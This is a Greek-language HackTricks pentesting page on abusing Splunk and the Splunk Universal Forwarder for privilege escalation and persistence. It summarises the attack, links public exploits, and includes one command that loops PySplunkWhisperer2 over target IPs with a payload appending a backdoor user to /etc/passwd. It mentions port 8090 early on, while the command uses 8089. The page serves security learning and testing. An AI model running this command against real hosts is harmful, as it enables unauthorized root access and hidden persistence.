HackTricksSplunk LPE και Επιμονή
Reading time: 3 minutes
tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
Αν καταμετράτε μια μηχανή εσωτερικά ή εξωτερικά και βρείτε το Splunk να τρέχει (θύρα 8090), αν έχετε την τύχη να γνωρίζετε οποιαδήποτε έγκυρα διαπιστευτήρια μπορείτε να καταχραστείτε την υπηρεσία Splunk για να εκτελέσετε ένα shell ως ο χρήστης που τρέχει το Splunk. Αν το τρέχει ο root, μπορείτε να αναβαθμίσετε τα δικαιώματα σε root.
Επίσης, αν είστε ήδη root και η υπηρεσία Splunk δεν ακούει μόνο σε localhost, μπορείτε να κλέψετε το αρχείο κωδικών από την υπηρεσία Splunk και να σπάσετε τους κωδικούς, ή να προσθέσετε νέα διαπιστευτήρια σε αυτό. Και να διατηρήσετε επιμονή στον host.
Στην πρώτη εικόνα παρακάτω μπορείτε να δείτε πώς φαίνεται μια σελίδα web του Splunkd.
Περίληψη Εκμετάλλευσης του Splunk Universal Forwarder Agent
Για περισσότερες λεπτομέρειες ελέγξτε την ανάρτηση https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/. Αυτή είναι απλώς μια περίληψη:
Επισκόπηση Εκμετάλλευσης: Μια εκμετάλλευση που στοχεύει τον Splunk Universal Forwarder Agent (UF) επιτρέπει στους επιτιθέμενους με τον κωδικό του agent να εκτελούν αυθαίρετο κώδικα σε συστήματα που τρέχουν τον agent, ενδεχομένως να διακυβεύσουν ολόκληρο το δίκτυο.
Κύρια Σημεία:
- Ο agent UF δεν επικυρώνει τις εισερχόμενες συνδέσεις ή την αυθεντικότητα του κώδικα, καθιστώντας τον ευάλωτο σε μη εξουσιοδοτημένη εκτέλεση κώδικα.
- Κοινές μέθοδοι απόκτησης κωδικών περιλαμβάνουν την εύρεση τους σε δίκτυα καταλόγων, κοινές χρήσεις αρχείων ή εσωτερική τεκμηρίωση.
- Η επιτυχής εκμετάλλευση μπορεί να οδηγήσει σε πρόσβαση σε επίπεδο SYSTEM ή root σε διακυβευμένους hosts, εξαγωγή δεδομένων και περαιτέρω διείσδυση στο δίκτυο.
Εκτέλεση Εκμετάλλευσης:
- Ο επιτιθέμενος αποκτά τον κωδικό του agent UF.
- Χρησιμοποιεί το API του Splunk για να στείλει εντολές ή scripts στους agents.
- Πιθανές ενέργειες περιλαμβάνουν εξαγωγή αρχείων, χειρισμό λογαριασμών χρηστών και διακυβέρνηση συστήματος.
Επίπτωση:
- Πλήρης διακυβέρνηση του δικτύου με δικαιώματα SYSTEM/root σε κάθε host.
- Πιθανότητα απενεργοποίησης της καταγραφής για να αποφευχθεί η ανίχνευση.
- Εγκατάσταση backdoors ή ransomware.
Παράδειγμα Εντολής για Εκμετάλλευση:
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
Χρήσιμα δημόσια exploits:
- https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
- https://www.exploit-db.com/exploits/46238
- https://www.exploit-db.com/exploits/46487
Κατάχρηση Ερωτημάτων Splunk
Για περισσότερες λεπτομέρειες ελέγξτε την ανάρτηση https://blog.hrncirik.net/cve-2023-46214-analysis
tip
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.